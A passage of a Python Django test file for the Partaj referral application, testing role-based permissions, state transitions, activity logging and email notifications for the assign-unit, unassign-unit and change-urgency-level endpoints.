        # An ASSIGNED_UNIT activity is logged for the acting user.
        self.assertEqual(
            models.ReferralActivity.objects.filter(
                actor=user,
                verb=models.ReferralActivityVerb.ASSIGNED_UNIT,
                referral=referral,
            ).count(),
            1,
        )
        # The owner of the newly assigned unit is notified by email, with a
        # link to the referral inside their own unit's view.
        link = (
            f"https://partaj/app/unit/{str(other_unit.id)}"
            f"/referrals-list/referral-detail/{referral.id}"
        )
        mock_mailer_send.assert_called_with(
            {
                "params": {
                    "assigned_by": user.get_full_name(),
                    "case_number": referral.id,
                    "link_to_referral": link,
                    "requester": referral.requester,
                    "topic": referral.topic.name,
                    "unit_name": other_unit.name,
                    "urgency": referral.urgency_level.name,
                },
                "replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
                "templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_UNIT_TEMPLATE_ID"],
                "to": [{"email": other_unit_owner.email}],
            }
        )
    def test_assign_unit_referral_from_processing_state(self, mock_mailer_send):
        """
        New unit assignments can be added on a referral in the PROCESSING state.
        """
        referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
        initial_unit = referral.units.get()
        user = factories.UnitMembershipFactory(
            role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
        ).user
        other_unit = factories.UnitFactory()
        other_unit_owner = factories.UnitMembershipFactory(
            role=models.UnitMembershipRole.OWNER, unit=other_unit
        ).user
        self.assertEqual(referral.units.count(), 1)
        response = self.client.post(
            f"/api/referrals/{referral.id}/assign_unit/",
            {"unit": str(other_unit.id)},
            HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
        )
        self.assertEqual(response.status_code, 200)
        # State is unchanged; the new unit is appended after the initial one
        # in the serialized payload.
        self.assertEqual(response.json()["state"], models.ReferralState.PROCESSING)
        self.assertEqual(len(response.json()["units"]), 2)
        self.assertEqual(response.json()["units"][0]["id"], str(initial_unit.id))
        self.assertEqual(response.json()["units"][1]["id"], str(other_unit.id))
        referral.refresh_from_db()
        self.assertEqual(referral.units.count(), 2)
        self.assertEqual(referral.state, models.ReferralState.PROCESSING)
        # An ASSIGNED_UNIT activity is logged for the acting user.
        self.assertEqual(
            models.ReferralActivity.objects.filter(
                actor=user,
                verb=models.ReferralActivityVerb.ASSIGNED_UNIT,
                referral=referral,
            ).count(),
            1,
        )
        # The owner of the newly assigned unit is notified by email, with a
        # link to the referral inside their own unit's view.
        link = (
            f"https://partaj/app/unit/{str(other_unit.id)}"
            f"/referrals-list/referral-detail/{referral.id}"
        )
        mock_mailer_send.assert_called_with(
            {
                "params": {
                    "assigned_by": user.get_full_name(),
                    "case_number": referral.id,
                    "link_to_referral": link,
                    "requester": referral.requester,
                    "topic": referral.topic.name,
                    "unit_name": other_unit.name,
                    "urgency": referral.urgency_level.name,
                },
                "replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
                "templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_UNIT_TEMPLATE_ID"],
                "to": [{"email": other_unit_owner.email}],
            }
        )
    def test_assign_unit_referral_from_in_validation_state(self, mock_mailer_send):
        """
        New unit assignments can be added on a referral in the IN_VALIDATION state.
        """
        referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
        initial_unit = referral.units.get()
        user = factories.UnitMembershipFactory(
            role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
        ).user
        other_unit = factories.UnitFactory()
        other_unit_owner = factories.UnitMembershipFactory(
            role=models.UnitMembershipRole.OWNER, unit=other_unit
        ).user
        self.assertEqual(referral.units.count(), 1)
        response = self.client.post(
            f"/api/referrals/{referral.id}/assign_unit/",
            {"unit": str(other_unit.id)},
            HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
        )
        self.assertEqual(response.status_code, 200)
        # State is unchanged; the new unit is appended after the initial one
        # in the serialized payload.
        self.assertEqual(response.json()["state"], models.ReferralState.IN_VALIDATION)
        self.assertEqual(len(response.json()["units"]), 2)
        self.assertEqual(response.json()["units"][0]["id"], str(initial_unit.id))
        self.assertEqual(response.json()["units"][1]["id"], str(other_unit.id))
        referral.refresh_from_db()
        self.assertEqual(referral.units.count(), 2)
        self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
        # An ASSIGNED_UNIT activity is logged for the acting user.
        self.assertEqual(
            models.ReferralActivity.objects.filter(
                actor=user,
                verb=models.ReferralActivityVerb.ASSIGNED_UNIT,
                referral=referral,
            ).count(),
            1,
        )
        # The owner of the newly assigned unit is notified by email, with a
        # link to the referral inside their own unit's view.
        link = (
            f"https://partaj/app/unit/{str(other_unit.id)}"
            f"/referrals-list/referral-detail/{referral.id}"
        )
        mock_mailer_send.assert_called_with(
            {
                "params": {
                    "assigned_by": user.get_full_name(),
                    "case_number": referral.id,
                    "link_to_referral": link,
                    "requester": referral.requester,
                    "topic": referral.topic.name,
                    "unit_name": other_unit.name,
                    "urgency": referral.urgency_level.name,
                },
                "replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
                "templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_UNIT_TEMPLATE_ID"],
                "to": [{"email": other_unit_owner.email}],
            }
        )
def test_assign_unit_referral_from_answered_state(self, mock_mailer_send):
"""
No new unit assignments can be added on a referral in the ANSWERED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
other_unit = factories.UnitFactory()
factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=other_unit
).user
self.assertEqual(referral.units.count(), 1)
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition ASSIGN_UNIT not allowed from state answered."]},
)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_unit_referral_from_closed_state(self, mock_mailer_send):
"""
No new unit assignments can be added on a referral in the CLOSED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
other_unit = factories.UnitFactory()
factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=other_unit
).user
self.assertEqual(referral.units.count(), 1)
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition ASSIGN_UNIT not allowed from state closed."]},
)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.CLOSED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
# UNASSIGN UNIT TESTS
def test_unassign_unit_referral_by_anonymous_user(self, mock_mailer_send):
"""
Anonymous users cannot unassign unit from referrals.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/", {"unit": str(other_unit.id)}
)
self.assertEqual(response.status_code, 401)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 2)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_by_random_logged_in_user(self, mock_mailer_send):
"""
Random logged-in users cannot unassign unit from referrals.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 2)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_by_linked_user(self, mock_mailer_send):
"""
A referral's linked user cannot unassign unit from referrals.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(
state=models.ReferralState.ASSIGNED, user=user
)
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 2)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_by_linked_unit_member(self, mock_mailer_send):
"""
A member of a referral's linked unit cannot unassign unit from referrals.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.MEMBER, unit=referral.units.get()
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 2)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_unassign_own_unit_referral_by_linked_unit_organizer(
self, mock_mailer_send
):
"""
An organizer in a referral's linked unit can unassign their own unit
from a referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
first_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=first_unit
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(first_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED_UNIT,
referral=referral,
).count(),
1,
)
mock_mailer_send.assert_not_called()
def test_unassign_another_unit_referral_by_linked_unit_organizer(
self, mock_mailer_send
):
"""
An organizer in a referral's linked unit can unassign another linked unit
from a referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
first_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=first_unit
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED_UNIT,
referral=referral,
).count(),
1,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_with_only_one_linked_unit(self, mock_mailer_send):
"""
A unit that is the only one assigned to a referral cannot be unassigned
from said referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=unit
).user
self.assertEqual(referral.units.count(), 1)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(), {"errors": ["Unit cannot be removed from this referral."]}
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_with_assigned_member(self, mock_mailer_send):
"""
A unit that has a member assigned to a referral cannot be unassigned
from said referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=unit
).user
referral.assignees.add(user)
self.assertEqual(referral.units.count(), 1)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(), {"errors": ["Unit cannot be removed from this referral."]}
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_from_received_state(self, mock_mailer_send):
"""
A referral in the RECEIVED state can have units unassigned from it.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
first_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=first_unit
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(first_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED_UNIT,
referral=referral,
).count(),
1,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_from_processing_state(self, mock_mailer_send):
"""
A referral in the PROCESSING state can have units unassigned from it.
"""
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
first_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=first_unit
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(first_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED_UNIT,
referral=referral,
).count(),
1,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_from_in_validation_state(self, mock_mailer_send):
"""
A referral in the IN_VALIDATION state can have units unassigned from it.
"""
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
first_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=first_unit
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(first_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED_UNIT,
referral=referral,
).count(),
1,
)
def test_unassign_unit_referral_from_answered_state(self, mock_mailer_send):
"""
A referral in the ANSWERED state cannot have units unassigned from it.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
first_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=first_unit
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(first_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(), {"errors": ["Unit cannot be removed from this referral."]}
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
self.assertEqual(referral.units.count(), 2)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_unassign_unit_referral_from_closed_state(self, mock_mailer_send):
"""
A referral in the CLOSED state cannot have units unassigned from it.
"""
referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
first_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=first_unit
).user
other_unit = factories.UnitFactory()
referral.units.add(other_unit)
referral.save()
self.assertEqual(referral.units.count(), 2)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign_unit/",
{"unit": str(first_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(), {"errors": ["Unit cannot be removed from this referral."]}
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.CLOSED)
self.assertEqual(referral.units.count(), 2)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
# CHANGE URGENCY LEVEL TESTS
def test_change_urgencylevel_by_anonymous_user(self, mock_mailer_send):
"""
Anonymous users cannot change a referral's urgency level.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
new_urgencylevel = factories.ReferralUrgencyFactory()
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(new_urgencylevel.id),
},
)
self.assertEqual(response.status_code, 401)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
mock_mailer_send.assert_not_called()
def test_change_urgencylevel_by_random_logged_in_user(self, mock_mailer_send):
"""
Random logged-in users cannot change a referral's urgency level.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
new_urgencylevel = factories.ReferralUrgencyFactory()
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(new_urgencylevel.id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
mock_mailer_send.assert_not_called()
def test_change_urgencylevel_by_referral_linked_user(self, mock_mailer_send):
"""
A referral's linked user cannot change the referral's urgency level.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(
user=user, state=models.ReferralState.RECEIVED
)
new_urgencylevel = factories.ReferralUrgencyFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "",
"urgencylevel": str(new_urgencylevel.id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
mock_mailer_send.assert_not_called()
def test_change_urgencylevel_by_unit_member(self, mock_mailer_send):
"""
A regular unit member cannot change a referral's urgency level.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.MEMBER, unit=referral.units.get()
).user
new_urgencylevel = factories.ReferralUrgencyFactory()
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(new_urgencylevel.id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
mock_mailer_send.assert_not_called()
    def test_change_urgencylevel_by_unit_admin(self, mock_mailer_send):
        """
        A unit admin can change a referral's urgency level.
        """
        # NOTE(review): no explicit state here — the RECEIVED assertion below
        # relies on the factory default; confirm against ReferralFactory.
        referral = factories.ReferralFactory()
        user = factories.UnitMembershipFactory(
            role=models.UnitMembershipRole.ADMIN, unit=referral.units.get()
        ).user
        new_urgencylevel = factories.ReferralUrgencyFactory()
        old_urgencylevel = referral.urgency_level
        self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
        response = self.client.post(
            f"/api/referrals/{referral.id}/change_urgencylevel/",
            {
                "urgencylevel_explanation": "La justification du changement.",
                "urgencylevel": str(new_urgencylevel.id),
            },
            HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
        )
        self.assertEqual(response.status_code, 200)
        # Make sure the urgency level is changed
        self.assertEqual(
            models.ReferralActivity.objects.filter(
                actor=user,
                verb=models.ReferralActivityVerb.URGENCYLEVEL_CHANGED,
                referral=referral,
            ).count(),
            1,
        )
        referral.refresh_from_db()
        self.assertEqual(referral.state, models.ReferralState.RECEIVED)
        self.assertEqual(new_urgencylevel.id, referral.urgency_level.id)
        # The requester is emailed exactly once, with the explanation and the
        # old/new due dates derived from the urgency level durations.
        self.assertEqual(mock_mailer_send.call_count, 1)
        self.assertEqual(
            tuple(mock_mailer_send.call_args_list[0]),
            (
                ( # args
                    {
                        "params": {
                            "case_number": referral.id,
                            "created_by": user.get_full_name(),
                            "link_to_referral": f"https://partaj/app/sent-referrals/referral-detail/{referral.id}",
                            "message": "La justification du changement.",
                            "new_due_date": dateformat.format(
                                referral.get_due_date(), "j F Y"
                            ),
                            "old_due_date": dateformat.format(
                                referral.created_at + old_urgencylevel.duration, "j F Y"
                            ),
                            "topic": referral.topic.name,
                        },
                        "replyTo": {
                            "email": "contact@partaj.beta.gouv.fr",
                            "name": "Partaj",
                        },
                        "templateId": settings.SENDINBLUE[
                            "REFERRAL_CHANGED_URGENCYLEVEL_FOR_REQUESTER_TEMPLATE_ID"
                        ],
                        "to": [{"email": referral.user.email}],
                    },
                ),
                {}, # kwargs
            ),
        )
        # Check the urgencylevel history instance that was created
        urgencylevel_history = models.ReferralUrgencyLevelHistory.objects.get(
            referral=referral, new_referral_urgency=new_urgencylevel
        )
        self.assertEqual(
            "La justification du changement.",
            urgencylevel_history.explanation,
        )
        self.assertEqual(new_urgencylevel, urgencylevel_history.new_referral_urgency)
        self.assertEqual(old_urgencylevel, urgencylevel_history.old_referral_urgency)
    def test_change_urgencylevel_by_unit_owner(self, mock_mailer_send):
        """
        Unit owners can change a referral's urgency level.
        """
        referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
        user = factories.UnitMembershipFactory(
            role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
        ).user
        new_urgencylevel = factories.ReferralUrgencyFactory()
        old_urgencylevel = referral.urgency_level
        self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
        response = self.client.post(
            f"/api/referrals/{referral.id}/change_urgencylevel/",
            {
                "urgencylevel_explanation": "La justification du changement.",
                "urgencylevel": str(new_urgencylevel.id),
            },
            HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
        )
        self.assertEqual(response.status_code, 200)
        # Make sure the urgency level is changed
        self.assertEqual(
            models.ReferralActivity.objects.filter(
                actor=user,
                verb=models.ReferralActivityVerb.URGENCYLEVEL_CHANGED,
                referral=referral,
            ).count(),
            1,
        )
        referral.refresh_from_db()
        self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
        self.assertEqual(new_urgencylevel.id, referral.urgency_level.id)
        # The requester is emailed exactly once, with the explanation and the
        # old/new due dates derived from the urgency level durations.
        self.assertEqual(mock_mailer_send.call_count, 1)
        self.assertEqual(
            tuple(mock_mailer_send.call_args_list[0]),
            (
                ( # args
                    {
                        "params": {
                            "case_number": referral.id,
                            "created_by": user.get_full_name(),
                            "link_to_referral": f"https://partaj/app/sent-referrals/referral-detail/{referral.id}",
                            "message": "La justification du changement.",
                            "new_due_date": dateformat.format(
                                referral.get_due_date(), "j F Y"
                            ),
                            "old_due_date": dateformat.format(
                                referral.created_at + old_urgencylevel.duration, "j F Y"
                            ),
                            "topic": referral.topic.name,
                        },
                        "replyTo": {
                            "email": "contact@partaj.beta.gouv.fr",
                            "name": "Partaj",
                        },
                        "templateId": settings.SENDINBLUE[
                            "REFERRAL_CHANGED_URGENCYLEVEL_FOR_REQUESTER_TEMPLATE_ID"
                        ],
                        "to": [{"email": referral.user.email}],
                    },
                ),
                {}, # kwargs
            ),
        )
        # Check the urgencylevel history instance that was created
        urgencylevel_history = models.ReferralUrgencyLevelHistory.objects.get(
            referral=referral, new_referral_urgency=new_urgencylevel
        )
        self.assertEqual(
            "La justification du changement.",
            urgencylevel_history.explanation,
        )
        self.assertEqual(new_urgencylevel, urgencylevel_history.new_referral_urgency)
        self.assertEqual(old_urgencylevel, urgencylevel_history.old_referral_urgency)
def test_change_urgencylevel_wrong_urgencylevel_id(self, mock_mailer_send):
"""
The urgency level parameter must point to an actual existing urgency level,
otherwise the request errors out.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=unit
).user
new_urgencylevel_id = 0
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(new_urgencylevel_id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertNotEqual(referral.urgency_level.id, 0)
mock_mailer_send.assert_not_called()
def test_change_urgencylevel_missing_urgencylevel_id(self, mock_mailer_send):
"""
The request errors out when the urgency level ID parameter is missing.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=unit
).user
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(""),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
mock_mailer_send.assert_not_called()
def test_change_urgencylevel_missing_urgencylevel_explanation(
    self, mock_mailer_send
):
    """
    Urgencylevel explanation is mandatory
    """
    referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
    unit = referral.units.get()
    # Unit owners are allowed to change urgency levels; act as one.
    user = factories.UnitMembershipFactory(
        role=models.UnitMembershipRole.OWNER, unit=unit
    ).user
    new_urgencylevel = factories.ReferralUrgencyFactory()
    # Sanity check: the factory produced a different urgency level.
    self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
    response = self.client.post(
